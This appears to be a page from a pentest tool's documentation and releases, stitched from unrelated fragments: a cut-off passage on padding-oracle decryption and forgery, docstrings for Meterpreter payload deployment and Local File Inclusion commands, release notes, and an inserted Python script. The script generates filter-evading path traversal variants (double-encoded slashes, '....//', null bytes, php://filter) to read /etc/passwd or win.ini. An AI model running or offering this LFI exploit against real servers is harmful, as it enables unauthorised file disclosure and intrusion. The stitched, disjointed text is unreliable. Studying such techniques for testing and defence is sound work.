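Each byte costs at most 256 oracle queries, so a whole block is recovered in at most 4096, which is why a web oracle is practical even over a slow link; the same loop run in reverse (choosing `forged` so the decrypted bytes spell a chosen plaintext) is the forgery variant the tool's configuration also covers.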

paranoid_meterpreter

Creates and deploys a paranoid Meterpreter payload and listener with SSL/TLS pinning and UUID tracking.

This function performs the following actions:

  1. Generates a self-signed SSL/TLS certificate for payload encryption.
  2. Creates either staged or stageless Meterpreter payloads with UUID tracking and TLS pinning.
  3. Configures and launches a Metasploit listener for the payload.

Parameters:
line (str): Command arguments specifying target configurations.
Expected format:
- rhost lhost domain subdomain

Returns:
None

lfi

Exploits a potential Local File Inclusion (LFI) vulnerability by crafting
and sending HTTP GET requests to a specified URL.

The user can specify the target URL directly via the line parameter or
provide it interactively. If no URL is provided, the method uses a default
value stored...
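Crafting the requests and recognising a hit, as an added Python example (not LazyOwn's lfi command): it generates traversal variants that beat the common naive filters, checks each response for a marker proving the file came back (raw, or base64-encoded via php://filter), and stops at the first working URL. The target URL http://target.example/index.php, the page parameter, the marker table and the `fake_fetch` server (which URL-decodes once, rejects null bytes and strips ../ a single time) are all constructed for the example.

```python
import base64
import binascii
import posixpath
from typing import Callable, List, Optional
from urllib.parse import quote, unquote

# Strings that prove the named file came back. Constructed for the example.
MARKERS = {"/etc/passwd": "root:x:0:0", "C:/Windows/win.ini": "[fonts]"}


def traversal_candidates(target: str, max_depth: int = 6) -> List[str]:
    """Variants of one target path that defeat the usual naive filters."""
    rel = target.lstrip("/")
    out = []
    for depth in range(1, max_depth + 1):
        up = "../" * depth
        out.append(up + rel)                                  # plain
        out.append(quote(up + rel, safe=""))                  # %2F, decoded once
        out.append((up + rel).replace("../", "..%252f"))      # double-encoded slash
        out.append((up + rel).replace("../", "....//"))       # survives one strip of ../
        out.append(up + rel + "%00")                          # null byte, old PHP only
    out.append(target)                                        # absolute, no traversal
    out.append("php://filter/convert.base64-encode/resource=" + target)
    return out


def _maybe_base64(body: str) -> Optional[str]:
    try:
        return base64.b64decode(body.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def looks_included(body: str, target: str) -> bool:
    """True if the response carries the marker for target, raw or base64 (php://filter)."""
    marker = MARKERS.get(target, "")
    if not marker:
        return False
    if marker in body:
        return True
    decoded = _maybe_base64(body)
    return decoded is not None and marker in decoded


def probe(url: str, param: str, fetch: Callable[[str], str],
          target: str = "/etc/passwd") -> Optional[str]:
    """Return the first request URL whose response includes target, else None."""
    for cand in traversal_candidates(target):
        full = f"{url}?{param}={cand}"
        if looks_included(fetch(full), target):
            return full
    return None


# Constructed stand-in for the target: include() under /var/www/html that
# URL-decodes once, rejects null bytes and strips "../" a single time.
_FAKE_FS = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"}


def fake_fetch(full_url: str) -> str:
    value = unquote(full_url.split("page=", 1)[1])
    if "\x00" in value:
        return "Warning: include(): null byte in path"
    value = value.replace("../", "")
    path = posixpath.normpath("/var/www/html/" + value)
    return _FAKE_FS.get(path, f"Warning: include({path}): failed to open stream")


if __name__ == "__main__":
    print(probe("http://target.example/index.php", "page", fake_fetch))
```

Against the constructed server only the `....//` form at depth three lands, which is the reason the candidate list carries several encodings per depth rather than one: a filter that strips `../` once, decodes once, or both, blocks different variants, and the probe has no way of knowing which filter sits in front of it.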


release/0.2.19

18 Nov 11:19
release/0.2.19
a68b2f9

What's Changed

Full Changelog: release/0.2.18...release/0.2.19

release/0.2.18

17 Nov 06:21
release/0.2.18
cc16581

What's Changed

Full Changelog: release/0.2.17...release/0.2.18